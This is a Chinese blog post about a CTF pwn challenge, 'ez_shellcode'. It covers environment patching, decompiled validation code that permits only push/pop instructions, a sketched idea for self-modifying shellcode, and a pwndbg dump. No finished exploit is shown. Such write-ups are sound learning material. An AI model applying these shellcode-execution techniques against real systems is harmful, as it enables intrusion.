

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/bug.png">
  <link rel="icon" href="/img/bug.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#1F3144">
  <meta name="author" content="ZLSF">
  <meta name="keywords" content="ZLSF,zlsf">
  
    <meta name="description" content="本系列仅吐槽题目出现姿势的奇葩，并不是说这是垃圾题，大家看了仅图一乐就好，顺便开阔一下视野 …  [第21届湖南省大学生计算机程序设计竞赛 – 网络攻防] – ez_shellcode ( 线下断网比赛 )附件下载：ez_shellcode.zip check： 12345678910[*] &#x27;&#x2F;home&#x2F;zlsf&#x2F;com&#x2F;SS&#x2F;002&#x2F;pwn&#x27;    Arch:">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwn题笑笑传之奇葩Pwn题-其一">
<meta property="og:url" content="https://zlsf-zl.github.io/2025/10/14/Pwn%E9%A2%98%E7%AC%91%E7%AC%91%E4%BC%A0%E4%B9%8B%E5%A5%87%E8%91%A9Pwn%E9%A2%98-%E5%85%B6%E4%B8%80/index.html">
<meta property="og:site_name" content="ZLSF的博客">
<meta property="og:description" content="本系列仅吐槽题目出现姿势的奇葩，并不是说这是垃圾题，大家看了仅图一乐就好，顺便开阔一下视野 …  [第21届湖南省大学生计算机程序设计竞赛 – 网络攻防] – ez_shellcode ( 线下断网比赛 )附件下载：ez_shellcode.zip check： 12345678910[*] &#x27;&#x2F;home&#x2F;zlsf&#x2F;com&#x2F;SS&#x2F;002&#x2F;pwn&#x27;    Arch:">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-10-14T12:34:37.000Z">
<meta property="article:modified_time" content="2025-10-15T11:18:43.224Z">
<meta property="article:author" content="ZLSF">
<meta property="article:tag" content="ZLSF,zlsf">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>Pwn题笑笑传之奇葩Pwn题-其一 - ZLSF的博客</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"zlsf-zl.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"6qfbMdW9PFOPATbmhAiyPWcK-MdYXbMMI","app_key":"X9xyyWbc7hafcwTqYXwdhjE5","server_url":"https://6qfbmdw9.api.lncldglobal.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>ZLSF的博客</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/start.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Pwn题笑笑传之奇葩Pwn题-其一"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-10-14 20:34" pubdate>
          2025年10月14日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.9k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          25 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Pwn题笑笑传之奇葩Pwn题-其一</h1>
            
            
              <div class="markdown-body">
                
                <p>本系列仅吐槽题目出现姿势的奇葩，并不是说这是垃圾题，大家看了仅图一乐就好，顺便开阔一下视野 …</p>
<hr>
<h3 id="第21届湖南省大学生计算机程序设计竞赛-–-网络攻防-–-ez-shellcode-线下断网比赛"><a href="#第21届湖南省大学生计算机程序设计竞赛-–-网络攻防-–-ez-shellcode-线下断网比赛" class="headerlink" title="[第21届湖南省大学生计算机程序设计竞赛 – 网络攻防] – ez_shellcode ( 线下断网比赛 )"></a>[第21届湖南省大学生计算机程序设计竞赛 – 网络攻防] – ez_shellcode ( 线下断网比赛 )</h3><p>附件下载：<a target="_blank" rel="noopener" href="https://z-l-s-f.lanzouq.com/ildpn38emmdi">ez_shellcode.zip</a></p>
<p>check：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs bash">[*] <span class="hljs-string">&#x27;/home/zlsf/com/SS/002/pwn&#x27;</span><br>    Arch:       amd64-64-little<br>    RELRO:      Full RELRO<br>    Stack:      Canary found<br>    NX:         NX enabled<br>    PIE:        PIE enabled<br>    RUNPATH:    b<span class="hljs-string">&#x27;./libcapstone.so.4&#x27;</span><br>    SHSTK:      Enabled<br>    IBT:        Enabled<br>    Stripped:   No<br></code></pre></td></tr></table></figure>

<p>环境配置：</p>
<p>刚下载出来的时候需要配置 libcapstone.so.4 ,  libc.so.6 , ld-linux-x86-64.so.2 三个链接文件。</p>
<p>根据赛后了解不少新师傅寄在了第一步，只会打 ld 和 libc，libcapstone.so.4 发现不知道怎么打上去。</p>
<p>实际上其打法和 libc 一样属于动态链接库，使用如下命令:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">patchelf --replace-needed libcapstone.so.4 ./libcapstone.so.4 ./pwn <br></code></pre></td></tr></table></figure>

<p>libc 打法如下:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">patchelf --replace-needed libc.so.6 ./libc.so.6 ./pwn <br></code></pre></td></tr></table></figure>

<p>ld 打法如下:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">patchelf --set-interpreter ./ld-linux-x86-64.so.2 ./pwn <br></code></pre></td></tr></table></figure>

<p>before:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">╰─ ldd ./pwn<br>	linux-vdso.so.1 (0x00007f4c8cc36000)<br>	libcapstone.so.4 =&gt; not found<br>	libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6 (0x00007f4c8ca00000)<br>	/lib64/ld-linux-x86-64.so.2 (0x00007f4c8cc38000)<br></code></pre></td></tr></table></figure>

<p>after:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">╰─ ldd ./pwn<br>	linux-vdso.so.1 (0x0000716137430000)<br>	./libcapstone.so.4 (0x0000716136c00000)<br>	./libc.so.6 (0x0000716136800000)<br>	./ld-linux-x86-64.so.2 =&gt; /lib64/ld-linux-x86-64.so.2 (0x0000716137432000)<br></code></pre></td></tr></table></figure>

<p>其实到这里一切都不是大问题。</p>
<p>而令人思之发笑的原因在于你做完这些以后仍然不能运行程序。</p>
<p>运行程序出现：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">╰─ ./pwn<br><span class="hljs-built_in">chroot</span> failed: Operation not permitted<br></code></pre></td></tr></table></figure>

<p>原因大概是是程序在 init 函数的 57 行：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">if</span> ( chroot(<span class="hljs-string">&quot;/tmp/jail&quot;</span>) )<br>&#123;<br>  v6 = __errno_location();<br>  v7 = strerror(*v6);<br>  <span class="hljs-built_in">fprintf</span>(_bss_start, <span class="hljs-string">&quot;chroot failed: %s\n&quot;</span>, v7);<br>  fflush(_bss_start);<br>  <span class="hljs-built_in">exit</span>(<span class="hljs-number">1</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>该函数需要 root 权限才能执行。</p>
<p>众所周知，作为符合 linux 要求规范的用户，我们平常都是使用普通用户，而一旦我们要用 sudo 运行该程序就上了个大 B 当了。因为我们的 pwn 环境完全是基于当前普通用户安装的，切换成 root 用户运行后 pwntools 完全不好和程序进行通讯，而且由于是线下赛，在无网络的环境下也是不敢贸然改动配置。</p>
<p>所以我为了绕过这个限制，正好提前准备了一些专门用来调试的虚拟机：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash">╰─ docker ps -a             <br>CONTAINER ID   IMAGE               COMMAND       CREATED        STATUS                      PORTS     NAMES<br>a68606c3fbe7   pwn-box-16.04       <span class="hljs-string">&quot;/bin/bash&quot;</span>   2 months ago   Exited (0) 2 months ago               pwn-box-16.04<br>0f1cb9a81ef0   pwn-box-24.04       <span class="hljs-string">&quot;/bin/bash&quot;</span>   3 months ago   Exited (130) 3 months ago             pwn-box-24.04<br>095f57452089   ubuntu:16.04        <span class="hljs-string">&quot;/bin/bash&quot;</span>   3 months ago   Exited (0) 3 months ago               kernel-bulid-16.04<br>e16f0e9f2623   ubuntu:20.04        <span class="hljs-string">&quot;/bin/bash&quot;</span>   5 months ago   Exited (0) 3 months ago               kernel-bulid-20.04<br>1c64b338c5af   debian-pwn-box-11   <span class="hljs-string">&quot;sh&quot;</span>          6 months ago   Exited (137) 5 months ago             debian-pwn-box-11<br>bf669a48bb3c   pwn-box-18.04       <span class="hljs-string">&quot;/bin/bash&quot;</span>   6 months ago   Exited (0) 6 months ago               pwn-box-18.04<br>d27f4411cd39   pwn-box-20.04       <span class="hljs-string">&quot;/bin/bash&quot;</span>   6 months ago   Exited (0) 3 months ago               pwn-box-20.04<br>a7895a6b544e   pwn-box-22.04       <span class="hljs-string">&quot;/bin/bash&quot;</span>   6 months ago   Exited (137) 23 hours ago             pwn-box-22.04<br>34e538203db8   python:2.7          <span class="hljs-string">&quot;/bin/bash&quot;</span>   7 months ago   Exited (0) 7 months ago   <br></code></pre></td></tr></table></figure>

<p>启用后都是默认进入 root shell。而且都可以和宿主机完成跨 docker 与 exp 联动调试。</p>
<p>详见 <a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/17785">利用pwntools脚本联动内置gdb函数优雅的调试docker中的pwn程序</a>。</p>
<p>至此已经完成了所有的环境准备，可以开始正式分析题目。</p>
<p>ida:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span> __fastcall <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span><br>&#123;<br>  <span class="hljs-type">void</span> *buf; <span class="hljs-comment">// [rsp+0h] [rbp-10h]</span><br>  <span class="hljs-type">ssize_t</span> v5; <span class="hljs-comment">// [rsp+8h] [rbp-8h]</span><br><br>  init(argc, argv, envp);<br>  buf = mmap(<span class="hljs-number">0LL</span>, <span class="hljs-number">0x1000</span>uLL, <span class="hljs-number">7</span>, <span class="hljs-number">34</span>, <span class="hljs-number">-1</span>, <span class="hljs-number">0LL</span>);<br>  v5 = read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">0x1000</span>uLL);<br>  <span class="hljs-keyword">if</span> ( v5 &gt; <span class="hljs-number">0</span> &amp;&amp; (<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>)validate(buf, v5) )<br>  &#123;<br>    <span class="hljs-keyword">if</span> ( (<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>)install_seccomp() )<br>    &#123;<br>      <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;seccomp install failed&quot;</span>);<br>      <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>    &#125;<br>    ((<span class="hljs-type">void</span> (*)(<span class="hljs-type">void</span>))buf)();<br>  &#125;<br>  <span class="hljs-keyword">else</span><br>  &#123;<br>    <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;error&quot;</span>);<br>  &#125;<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>main 函数中的 init 和 install_seccomp 函数都不重要，其中 install_seccomp 注册的沙盒我们可以通过 patch 掉前面的代码之后使用 seccomp-tools 检查沙盒。</p>
<p>是的，如果你没有过掉 validate 的检查，你连沙盒都看不了，而需要过 validate 的检查就必须要用 pwntools ，此时又用不了 seccomp-tools。</p>
<p>所以我建议 —– 直接 patch ！！！</p>
<p>在输入完 shellcode 后程序会直接执行你的 shellcode。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs c">__int64 __fastcall <span class="hljs-title function_">validate</span><span class="hljs-params">(__int64 a1, __int64 a2)</span><br>&#123;<br>  <span class="hljs-type">bool</span> v3; <span class="hljs-comment">// al</span><br>  <span class="hljs-type">char</span> v4; <span class="hljs-comment">// [rsp+1Ch] [rbp-44h]</span><br>  __int64 v5; <span class="hljs-comment">// [rsp+20h] [rbp-40h] BYREF</span><br>  __int64 v6; <span class="hljs-comment">// [rsp+28h] [rbp-38h] BYREF</span><br>  __int64 v7; <span class="hljs-comment">// [rsp+30h] [rbp-30h]</span><br>  <span class="hljs-type">unsigned</span> __int64 i; <span class="hljs-comment">// [rsp+38h] [rbp-28h]</span><br>  <span class="hljs-type">unsigned</span> __int64 v9; <span class="hljs-comment">// [rsp+40h] [rbp-20h]</span><br>  <span class="hljs-type">char</span> *s1; <span class="hljs-comment">// [rsp+48h] [rbp-18h]</span><br>  _BYTE *v11; <span class="hljs-comment">// [rsp+50h] [rbp-10h]</span><br>  <span class="hljs-type">unsigned</span> __int64 v12; <span class="hljs-comment">// [rsp+58h] [rbp-8h]</span><br><br>  v12 = __readfsqword(<span class="hljs-number">0x28</span>u);<br>  v4 = <span class="hljs-number">1</span>;<br>  <span class="hljs-keyword">if</span> ( (<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>)cs_open(<span class="hljs-number">3LL</span>, <span class="hljs-number">8LL</span>, &amp;v5) )<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0LL</span>;<br>  v9 = cs_disasm(v5, a1, a2, <span class="hljs-number">0LL</span>, <span class="hljs-number">0LL</span>, &amp;v6);<br>  v7 = <span class="hljs-number">0LL</span>;<br>  <span class="hljs-keyword">if</span> ( !v9 )<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0LL</span>;<br>  <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0LL</span>; i &lt; v9; ++i )<br>  &#123;<br>    s1 = (<span class="hljs-type">char</span> *)(v6 + <span class="hljs-number">240</span> * i + <span class="hljs-number">34</span>);<br>    v11 = (_BYTE *)(v6 + <span class="hljs-number">240</span> * i + <span class="hljs-number">66</span>);<br>    v3 = !<span class="hljs-built_in">strcmp</span>(s1, <span class="hljs-string">&quot;pop&quot;</span>) || !<span class="hljs-built_in">strcmp</span>(s1, <span class="hljs-string">&quot;push&quot;</span>);<br>    v4 &amp;= *v11 == <span class="hljs-number">114</span> &amp;&amp; v3;<br>    v7 += *(<span class="hljs-type">unsigned</span> __int16 *)(v6 + <span class="hljs-number">240</span> * i + <span class="hljs-number">16</span>);<br>  &#125;<br>  cs_free(v6, v9);<br>  cs_close(&amp;v5);<br>  <span class="hljs-keyword">return</span> (a2 == v7) &amp; (<span class="hljs-type">unsigned</span> __int8)v4;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这部分逆向出来大致意思就是只允许你写入的 shellcode 存在 pop r系列和 push r系列的指令。</p>
<p>这意味着我们可以轻松控制任何一个寄存器，至于如何劫持程序流蛮，也十分简单，就是通过 pop rsp 和 push r系列的指令通过 pop 栈上存在的 shellcode 地址到 rsp 中就能将栈指针引到 shellcode 上，此时再次 push 就能将任一寄存器的内容压入 shellcode 完成对 shellcode 的修改。</p>
<p>我们现在来看看当执行 shellcode 时每个寄存器的内容以及栈上的内容：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs c">─────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────<br> RAX  <span class="hljs-number">0</span><br> RBX  <span class="hljs-number">0</span><br> RCX  <span class="hljs-number">0x763bd4460381</span> (prctl+<span class="hljs-number">81</span>) ◂— cmp rax, <span class="hljs-number">-0x1000</span> <span class="hljs-comment">/* &#x27;H=&#x27; */</span><br> RDX  <span class="hljs-number">0x763bd4bef000</span> ◂— <span class="hljs-number">0x5f</span> <span class="hljs-comment">/* &#x27;_&#x27; */</span><br> RDI  <span class="hljs-number">0x16</span><br> RSI  <span class="hljs-number">2</span><br> R8   <span class="hljs-number">0</span><br> R9   <span class="hljs-number">0x763bd4bef000</span> ◂— <span class="hljs-number">0x5f</span> <span class="hljs-comment">/* &#x27;_&#x27; */</span><br> R10  <span class="hljs-number">0x763bd4460381</span> (prctl+<span class="hljs-number">81</span>) ◂— cmp rax, <span class="hljs-number">-0x1000</span> <span class="hljs-comment">/* &#x27;H=&#x27; */</span><br> R11  <span class="hljs-number">0x246</span><br> R12  <span class="hljs-number">0x7ffe792a2ee8</span> —▸ <span class="hljs-number">0x7ffe792a38d2</span> ◂— <span class="hljs-number">0x4f48006e77702f2e</span> <span class="hljs-comment">/* &#x27;./pwn&#x27; */</span><br> R13  <span class="hljs-number">0x578797144ba6</span> (main) ◂— endbr64 <br> R14  <span class="hljs-number">0x578797146ce8</span> (__do_global_dtors_aux_fini_array_entry) —▸ <span class="hljs-number">0x578797144420</span> (__do_global_dtors_aux) ◂— endbr64 <br> R15  <span class="hljs-number">0x763bd4bf2040</span> (_rtld_global) —▸ <span class="hljs-number">0x763bd4bf32e0</span> —▸ <span class="hljs-number">0x578797143000</span> ◂— <span class="hljs-number">0x10102464c457f</span><br> RBP  <span class="hljs-number">0x7ffe792a2dd0</span> ◂— <span class="hljs-number">1</span><br>*RSP  <span class="hljs-number">0x7ffe792a2db8</span> —▸ <span class="hljs-number">0x578797144c4c</span> (main+<span class="hljs-number">166</span>) ◂— jmp main+<span class="hljs-number">183</span><br>*RIP  <span class="hljs-number">0x763bd4bef000</span> ◂— <span class="hljs-number">0x5f</span> <span class="hljs-comment">/* &#x27;_&#x27; */</span><br>──────────────────────[ DISASM / x86<span class="hljs-number">-64</span> / <span class="hljs-built_in">set</span> emulate on ]──────────────────────<br> ► <span class="hljs-number">0x763bd4bef000</span>    pop    rdi                    RDI =&gt; <span class="hljs-number">0x578797144c4c</span> (main+<span class="hljs-number">166</span>)<br>   <span class="hljs-number">0x763bd4bef001</span>    add    byte ptr [rax], al<br>   <span class="hljs-number">0x763bd4bef003</span>    add    byte ptr [rax], al<br>   <span class="hljs-number">0x763bd4bef005</span>    add    byte ptr [rax], al<br>   <span class="hljs-number">0x763bd4bef007</span>    add    byte ptr [rax], al<br>   <span class="hljs-number">0x763bd4bef009</span>    add    byte ptr [rax], al<br>   <span class="hljs-number">0x763bd4bef00b</span>    add    byte ptr [rax], al<br>   <span class="hljs-number">0x763bd4bef00d</span>    add    byte ptr [rax], al<br>   <span class="hljs-number">0x763bd4bef00f</span>    add    byte ptr [rax], al<br>   <span class="hljs-number">0x763bd4bef011</span>    add    byte ptr [rax], al<br>   <span class="hljs-number">0x763bd4bef013</span>    add    byte ptr [rax], al<br>───────────────────────────────────[ STACK ]────────────────────────────────────<br><span class="hljs-number">00</span>:<span class="hljs-number">0000</span>│ rsp <span class="hljs-number">0x7ffe792a2db8</span> —▸ <span class="hljs-number">0x578797144c4c</span> (main+<span class="hljs-number">166</span>) ◂— jmp main+<span class="hljs-number">183</span><br><span class="hljs-number">01</span>:<span class="hljs-number">0008</span>│<span class="hljs-number">-010</span> <span class="hljs-number">0x7ffe792a2dc0</span> —▸ <span class="hljs-number">0x763bd4bef000</span> ◂— <span class="hljs-number">0x5f</span> <span class="hljs-comment">/* &#x27;_&#x27; */</span><br><span class="hljs-number">02</span>:<span class="hljs-number">0010</span>│<span class="hljs-number">-008</span> <span class="hljs-number">0x7ffe792a2dc8</span> ◂— <span class="hljs-number">1</span><br><span class="hljs-number">03</span>:<span class="hljs-number">0018</span>│ rbp <span class="hljs-number">0x7ffe792a2dd0</span> ◂— <span class="hljs-number">1</span><br><span class="hljs-number">04</span>:<span class="hljs-number">0020</span>│+<span class="hljs-number">008</span> <span class="hljs-number">0x7ffe792a2dd8</span> —▸ <span class="hljs-number">0x763bd4363d90</span> ◂— mov edi, eax<br><span class="hljs-number">05</span>:<span class="hljs-number">0028</span>│+<span class="hljs-number">010</span> <span class="hljs-number">0x7ffe792a2de0</span> ◂— <span class="hljs-number">0</span><br><span class="hljs-number">06</span>:<span class="hljs-number">0030</span>│+<span class="hljs-number">018</span> <span class="hljs-number">0x7ffe792a2de8</span> —▸ <span class="hljs-number">0x578797144ba6</span> (main) ◂— endbr64 <br><span class="hljs-number">07</span>:<span class="hljs-number">0038</span>│+<span class="hljs-number">020</span> <span class="hljs-number">0x7ffe792a2df0</span> ◂— <span class="hljs-number">0x100000000</span><br>─────────────────────────────────[ BACKTRACE ]──────────────────────────────────<br> ► <span class="hljs-number">0</span>   <span class="hljs-number">0x763bd4bef000</span> None<br>   <span class="hljs-number">1</span>   <span class="hljs-number">0x578797144c4c</span> main+<span class="hljs-number">166</span><br>   <span class="hljs-number">2</span>   <span class="hljs-number">0x763bd4363d90</span> None<br>   <span class="hljs-number">3</span>   <span class="hljs-number">0x763bd4363e40</span> __libc_start_main+<span class="hljs-number">128</span><br>   <span class="hljs-number">4</span>   <span class="hljs-number">0x5787971443a5</span> _start+<span class="hljs-number">37</span><br>────────────────────────────────────────────────────────────────────────────────<br>pwndbg&gt; <br></code></pre></td></tr></table></figure>

